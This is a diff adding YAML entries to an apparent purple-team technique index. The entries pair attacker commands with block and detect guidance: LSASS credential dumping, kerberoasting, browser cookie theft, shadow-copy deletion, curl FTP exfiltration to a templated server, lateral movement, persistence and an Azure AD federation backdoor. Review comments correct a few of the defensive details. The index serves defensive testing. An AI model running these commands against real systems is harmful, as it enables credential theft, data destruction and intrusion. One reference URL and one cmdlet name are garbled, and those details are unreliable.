+- name: Extract Logonpasswords via Nanodump
+ description: Use nanodump to extract credentials from LSASS process memory
+ platforms:
+ - windows
+ guidance:
+ - cmd> nanodump.exe --duplicate -w {{ out_file }}
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Enable Credential Guard to prevent traditional process dumping of LSASS
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ controls:
+ - Endpoint Protection
+ - Hardening
+ metadata:
+ id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+ tid: T1003.001
+ tactic: TA0006
+ x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+ isv: 1
+- name: Dump LSASS memory using builtin comsvcs.dll
+ description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+ platforms:
+ - windows
+ guidance:
+ - shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Enable Credential Guard to prevent traditional process dumping of LSASS
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ controls:
+ - SIEM
+ - Endpoint Protection
+ - Hardening
+ metadata:
+ id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+ tid: T1003.001
+ tactic: TA0006
+ x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+ isv: 1
+- name: Dump LSASS memory using Sysinternals ProcDump
+ description: Use ProcDump from Sysinternals to dump LSASS process memory
+ platforms:
+ - windows
+ guidance:
+ - CMD> procdump -ma lsass.exe dump
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ - Enable Credential Guard to prevent traditional process dumping of LSASS
+ - Block the installation and use of unapproved third-party utilities via application control software
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ controls:
+ - SIEM
+ - Endpoint Protection
+ - Hardening
+ - Application Control
+ metadata:
+ id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+ tid: T1003.001
+ tactic: TA0006
+ x_tools:
+ - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+ x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+ isv: 1
+- name: Extract browser cookies
+ description: Extract cookie information from the user's browser
+ platforms:
+ - windows
+ guidance:
+ - cmd> SharpChrome.exe cookies
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 95790889-fb7d-42af-a221-3535e4197cde
+ tid: T1555.003
+ tactic: TA0006
+ x_tools:
+ - https://github.com/GhostPack/SharpDPAPI
+ x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+ isv: 1
+- name: Volumetric Kerberoasting
+ description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+ platforms:
+ guidance:
+ - cmd> Rubeus.exe kerberoast
+ block:
+ - ''
+ detect:
+ - 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+ controls:
+ - SIEM
+ - Identity Threat Protection
+ metadata:
+ id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+ tid: T1558.003
+ tactic: TA0006
+ x_tools:
+ - https://github.com/GhostPack/Rubeus
+ x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+ isv: 1
+- name: Enabled WDigest via Registry
+ description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+ platforms:
+ - windows
+ guidance:
+ - cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+ block:
+ - Suspicious Registry modification blocked by endpoint security tool
+ detect:
+ - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+ tid: T1112
+ tactic: TA0005
+ x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+ isv: 1
+Impact:
+- name: Encrypt a large amount of files
+ description: Encrypt a large amount of files on the endpoint to simulate ransomware
+ platforms:
+ guidance:
+ - cmd> coldcryptor.exe run {{ extension }}
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool
+ - Detect common ransomware extensions using file system telemetry
+ controls:
+ - Endpoint Protection
+ metadata:
+ id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+ tid: T1486
+ tactic: TA0040
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+ x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+ isv: 1
+- name: Delete shadows with vssadmin.exe
+ description: Delete volume shadow copies on the host to inhibit file system recovery
+ platforms:
+ - windows
+ guidance:
+ - CMD> vssadmin.exe delete shadows /all /quiet
+ block:
+ - Suspicious process execution/behavior blocked by endpoint security tool
+ detect:
+ - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+ - Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+ controls:
+ - Endpoint Protection
+ - SIEM
+ metadata:
+ id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+ tid: T1490
+ tactic: TA0040
+ x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+ isv: 1
+- name: Modify group policy object
+ description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+ platforms: + guidance: + block: + - '' + detect: + - Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes + controls: + - SIEM + metadata: + id: 45591791-541b-4a27-bda9-75e6d78a66f4 + tid: T1484.001 + tactic: TA0005 + x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4 + isv: 1 +Exfiltration: +- name: Extract sensitive data over HTTP + description: Extract data from the network over HTTP tcp/80 to an external host or IP. + platforms: + guidance: + - http://dlptest.com/http-post/ + block: + - Sensitive data sent over the network is blocked by network DLP tool + detect: + - Sensitive data sent over the network is detected by network DLP tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860 + tid: T1048.003 + tactic: TA0010 + x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860 + isv: 1 +- name: Extract sensitive data over FTP + description: Exfiltrate data from the internal network to an external system via FTP + platforms: + guidance: + - https://dlptest.com/ftp-test/ + - shell> curl --ftp-create-dirs -T {{ local_file }} ftp://{{ username }}:{{ password }}@{{ server }}/{{ dest_path }} + block: + - Outbound connections over FTP are blocked by network security configurations + - Sensitive data sent over the network is blocked by network DLP tool + detect: + - Sensitive data sent over the network is detected by network DLP tool + controls: + - DLP + - Firewall + metadata: + id: 11b7a86e-4596-4df9-a2a9-705096756d28 + tid: T1048.003 + tactic: TA0010 + x_vectr_id: 11b7a86e-4596-4df9-a2a9-705096756d28 + isv: 1 +- name: Extract data to cloud storage service + description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box + platforms: + guidance: + block: + - Sensitive data sent over the network is blocked by network DLP tool + - Network security 
tool detects connection to domain based on category from proxy or DNS + detect: + - Sensitive data sent over the network is detected by network DLP tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66 + tid: T1567.002 + tactic: TA0010 + x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66 + isv: 1 +- name: Extract sensitive data over HTTP C2 + description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP + platforms: + guidance: + - implant> download {{ file }} + block: + - Sensitive data sent over the network is blocked by network DLP tool + - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool + detect: + - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool + controls: + - Firewall + - DLP + - Web Gateway + metadata: + id: b48fa856-d004-4d5a-918f-d9429a9cd8e3 + tid: T1041 + tactic: TA0010 + x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3 + isv: 1 +Lateral Movement: +- name: Lateral Movement via WMI + description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system + platforms: + - windows + guidance: + - CMD> wmic /node:"{{ target }}" process call create "{{ command }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Host-based firewalls prevent direct communications over common ports/protocols + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - Endpoint Protection + - SIEM + - Identity Threat Protection + - Hardening + metadata: + id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79 + tid: T1021.003 
+ tactic: TA0008 + x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79 + isv: 1 +- name: Lateral Movement via PsExec + description: Move to another system by creating a service remotely via Sysinternals PsExec + platforms: + - windows + guidance: + - CMD> psexec -s \{{ target }} {{ command }} + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Host-based firewalls prevent direct communications over common ports/protocols + - Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - Endpoint Protection + - SIEM + - Identity Threat Protection + - Hardening + metadata: + id: 9b5396f2-6e4a-498a-995e-47e48a99bf76 + tid: T1021.002 + tactic: TA0008 + x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76 + isv: 1 +- name: Lateral Movement via RDP + description: Perform an interactive logons to a Windows system via RDP + platforms: + - windows + guidance: + - CMD> mstsc /v:{{ target }} + block: + - Host-based firewalls prevent direct communications over common ports/protocols + detect: + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - SIEM + - Identity Threat Protection + - Hardening + metadata: + id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61 + tid: T1021.001 + tactic: TA0008 + x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61 + isv: 1 +- name: Remote .exe copy + description: Copy an .exe payload to 
a temp folder on the remote target + platforms: + guidance: + - cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }} + block: + - Host-based firewalls prevent direct communications over common ports/protocols + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - Endpoint Protection + - Antivirus + - SIEM + metadata: + id: b74ff4c5-eebf-466b-af85-341b19c4c748 + tid: T1570 + tactic: TA0008 + x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748 + isv: 1 +Persistence: +- name: Persist via new scheduled task + description: Persist on a system by creating a new scheduled task + platforms: + - windows + guidance: + - cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00 + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks. 
+ controls: + - SIEM + - Endpoint Protection + metadata: + id: 20a6dace-d801-42f5-b659-6cf91e39d273 + tid: T1053.005 + tactic: TA0003 + x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273 + isv: 1 +- name: Persist via new Windows service + description: Persist on a system by creating a new service + platforms: + - windows + guidance: + - CMD> sc create {{ service_name }} binPath= "{{ command }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services. + controls: + - SIEM + - Endpoint Protection + metadata: + id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737 + tid: T1543.003 + tactic: TA0003 + x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737 + isv: 1 +- name: Persist via Registry Winlogon Shell + description: Run a payload during user login by setting a Registry Winlogon key + platforms: + - windows + guidance: + - CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656). 
+ controls: + - Endpoint Protection + - SIEM + metadata: + id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622 + tid: T1547.004 + tactic: TA0003 + x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622 + isv: 1 +- name: Persist via new local administrator + description: Create a new local user then add them to the "Administrators" group using the builtin net.exe + platforms: + - windows + guidance: + - CMD> net user /add {{ username }} {{ password }} + - CMD> net localgroup administrators {{ username }} /add + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Use group modification events (Event ID 4728) to identify additions to local security groups. + controls: + - Endpoint Protection + - SIEM + metadata: + id: 0bcb2080-b140-4a1c-9e79-8512a18882d8 + tid: T1136.001 + tactic: TA0003 + x_vectr_id: 0bcb2080-b140-4a1c-9e79-8512a18882d8 + isv: 1 +- name: Register a new device in Azure AD + description: Register a new device in Azure AD + platforms: + - azuread + guidance: + - PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1" + block: + - 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings' + detect: + - Detect anomalous device registration events by using Azure audit logs + controls: + - SIEM + - Hardening + metadata: + id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96 + tid: T1098.005 + tactic: TA0003 + x_tools: + - AADInternals + x_references: + - htpts://aadinternals.nom/post/prt/ + x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96 + isv: 1 +- name: Configure a custom federated domain + description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. 
This can be used for persistent access into the tenant. + platforms: + - azuread + guidance: + - PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}" + block: + - '' + detect: + - Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated". + - https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html + controls: + - SIEM + metadata: + id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1 + tid: T1484.002 + tactic: TA0003 + x_tools: + - AADInternals + x_references: + - https://o365blog.com/post/aadbackdoor/ + x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1 + isv: 1 +metadata: + prefix: RHI + bundle: Retail and Hospitality Index 2024 v1.0 diff --git a/rh-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml b/rh-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml new file mode 100644 index 0000000..d274f20 --- /dev/null +++ b/rh-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml @@ -0,0 +1,19 @@ +name: Screen Capture +description: Capture an image of the user's screen +platforms: +guidance: +- "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}" +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +controls: +- Endpoint Protection +metadata: + id: 804512cc-4acf-4be3-a577-ce02ea723fab + tid: T1113 + tactic: TA0009 + x_tools: + - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs + x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab + isv: 1 diff --git a/rh-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml b/rh-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml new file mode 100644 index 0000000..62f850b --- /dev/null 
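Review bot: `platforms:` is left empty at the top of this file, which YAML parses as null rather than as an empty list, so a consumer that iterates `entry["platforms"]` fails here while it works for the files that list `- windows`. The same null `platforms:` appears in 10f6c44e, 38064494, 3ed2f449, 9755cd8b and c13ac2bf. If "any platform" is the intent, `platforms: []` makes that explicit and keeps the field's type consistent across the index; a one-line note on the convention in the index README would save the next author guessing.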
+++ b/rh-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml @@ -0,0 +1,20 @@ +name: Keylogger +description: Log user keystrokes +platforms: +- windows +guidance: +- "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}" +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +controls: +- Endpoint Protection +metadata: + id: be524cb1-12e6-4708-ad57-faf91dfad9de + tid: T1056.001 + tactic: TA0009 + x_tools: + - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs + x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de + isv: 1 diff --git a/rh-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml b/rh-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml new file mode 100644 index 0000000..250d96d --- /dev/null +++ b/rh-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml @@ -0,0 +1,20 @@ +name: Access via remote assistance tool +description: Establish connection to system using a legitimate remote assistance application +platforms: +guidance: +block: +- Block the installation and use of unapproved third-party utilities via application control software +- Connections to known remote access service domains/IPs are blocked +- Remote access connection attempts originating from users outside of the tenant are blocked +detect: +- Connections to known remote access service domains/IPs are detected +controls: +- Application Control +- ID/PS +- Firewall +metadata: + id: 10f6c44e-b862-4553-bc55-68f6d941bcfb + tid: T1219 + tactic: TA0011 + x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb + isv: 1 diff --git a/rh-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml b/rh-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml new file mode 100644 index 0000000..fa200fe --- /dev/null 
+++ b/rh-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml @@ -0,0 +1,18 @@ +name: HTTP C2 over tcp/80 +description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP +platforms: +guidance: +block: +- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool +detect: +- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool +controls: +- Firewall +- ID/PS +- Web Gateway +metadata: + id: 38064494-0d58-4f48-bce8-b5b7ea7db3da + tid: T1071.001 + tactic: TA0011 + x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da + isv: 1 diff --git a/rh-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml b/rh-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml new file mode 100644 index 0000000..075c765 --- /dev/null +++ b/rh-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml @@ -0,0 +1,18 @@ +name: HTTPS C2 over tcp/443 +description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS +platforms: +guidance: +block: +- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool +detect: +- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool +controls: +- Firewall +- ID/PS +- Web Gateway +metadata: + id: 3ed2f449-744b-48c3-80d2-854386e446a0 + tid: T1071.001 + tactic: TA0011 + x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0 + isv: 1 diff --git a/rh-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml b/rh-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml new file mode 100644 index 0000000..ac75a59 --- /dev/null +++ b/rh-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml 
@@ -0,0 +1,18 @@ +name: Remote tool download over HTTP +description: Download a tool from a public hosting location onto the victim system +platforms: +guidance: +block: +- Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS +detect: +- Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS +controls: +- Firewall +- ID/PS +- Web Gateway +metadata: + id: 9755cd8b-5212-4331-8c6e-afb27404a4b9 + tid: T1105 + tactic: TA0011 + x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9 + isv: 1 diff --git a/rh-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml b/rh-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml new file mode 100644 index 0000000..12180d9 --- /dev/null +++ b/rh-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml @@ -0,0 +1,21 @@ +name: Dump LSASS memory using builtin comsvcs.dll +description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk +platforms: +- windows +guidance: +- shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full +block: +- Suspicious process execution/behavior blocked by endpoint security tool +- Enable Credential Guard to prevent traditional process dumping of LSASS +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +controls: +- SIEM +- Endpoint Protection +- Hardening +metadata: + id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8 + tid: T1003.001 + tactic: TA0006 + x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8 + isv: 1 diff --git a/rh-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml b/rh-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml new file mode 100644 index 0000000..821fcc8 --- /dev/null 
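Review bot: The block item `Enable Credential Guard to prevent traditional process dumping of LSASS` overstates what Credential Guard does: it isolates secrets in LSAIso so a dump yields no reusable NTLM hashes or Kerberos keys, but it does not stop the MiniDump call, and the rundll32/comsvcs guidance in this file will still write a dump file. The control that actually blocks the read is LSA protection (`RunAsPPL`), which prevents an unprotected process from opening LSASS with memory-read access; I'd reword to `Enable LSA protection (RunAsPPL) to block process memory access to LSASS, and Credential Guard so that any dump that does succeed contains no reusable secrets`. The same wording is in 79640171 and 8eeb3c12. Separately, the guidance prefix here is `shell>` while the sibling files use `cmd>`/`CMD>`; one spelling would help anyone grepping the index for command lines.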
+++ b/rh-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml @@ -0,0 +1,25 @@ +name: Dump LSASS memory using Sysinternals ProcDump +description: Use ProcDump from Sysinternals to dump LSASS process memory +platforms: +- windows +guidance: +- CMD> procdump -ma lsass.exe dump +block: +- Suspicious process execution/behavior blocked by endpoint security tool +- Enable Credential Guard to prevent traditional process dumping of LSASS +- Block the installation and use of unapproved third-party utilities via application control software +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +controls: +- SIEM +- Endpoint Protection +- Hardening +- Application Control +metadata: + id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1 + tid: T1003.001 + tactic: TA0006 + x_tools: + - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump + x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1 + isv: 1 diff --git a/rh-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml b/rh-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml new file mode 100644 index 0000000..cd0d822 --- /dev/null +++ b/rh-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml @@ -0,0 +1,20 @@ +name: Extract Logonpasswords via Nanodump +description: Use nanodump to extract credentials from LSASS process memory +platforms: +- windows +guidance: +- cmd> nanodump.exe --duplicate -w {{ out_file }} +block: +- Suspicious process execution/behavior blocked by endpoint security tool +- Enable Credential Guard to prevent traditional process dumping of LSASS +detect: +- Suspicious process execution/behavior detected by endpoint security tool +controls: +- Endpoint Protection +- Hardening +metadata: + id: 8eeb3c12-dc2e-4791-aff5-e81501312886 + tid: T1003.001 + tactic: TA0006 + x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886 + isv: 1 
diff --git a/rh-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml b/rh-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml new file mode 100644 index 0000000..e5b69b7 --- /dev/null +++ b/rh-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml @@ -0,0 +1,22 @@ +name: Extract browser cookies +description: Extract cookie information from the user's browser +platforms: +- windows +guidance: +- cmd> SharpChrome.exe cookies +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Suspicious access to database files used by browsers detected using file system telemetry in the SIEM +controls: +- Endpoint Protection +- SIEM +metadata: + id: 95790889-fb7d-42af-a221-3535e4197cde + tid: T1555.003 + tactic: TA0006 + x_tools: + - https://github.com/GhostPack/SharpDPAPI + x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde + isv: 1 diff --git a/rh-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml b/rh-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml new file mode 100644 index 0000000..642834a --- /dev/null +++ b/rh-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml 
@@ -0,0 +1,19 @@ +name: Enabled WDigest via Registry +description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory +platforms: +- windows +guidance: +- cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f +block: +- Suspicious Registry modification blocked by endpoint security tool +detect: +- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656). +controls: +- Endpoint Protection +- SIEM +metadata: + id: 9a66066b-997b-4ff1-8b4b-c14d982df861 + tid: T1112 + tactic: TA0005 + x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861 + isv: 1 diff --git a/rh-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml b/rh-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml new file mode 100644 index 0000000..ff73fb9 --- /dev/null +++ b/rh-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml 
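Review bot: The detect entry asks for a SACL on "the Registry" in general, but this technique touches exactly one value, so the audit rule should be scoped to `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest` and alert on `UseLogonCredential` being set to 1; an unscoped registry SACL produces far too many 4656 events to alert on. Event ID 4656 only records the handle request; the write itself is Event ID 4657 (registry value modified), which carries the old and new value and is the better alert source here. The sentence also has a grammar slip, `Trigger an alert when modification are made the Registry` → `Trigger an alert when modifications are made to the Registry`, and `name: Enabled WDigest via Registry` reads better as `Enable WDigest via Registry` to match the imperative names elsewhere. The file lives under CredentialAccess while `tactic: TA0005` is Defense Evasion; I can't tell from the diff which is intended, but the bundle groups it with the credential-access entries, so one of the two should change.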
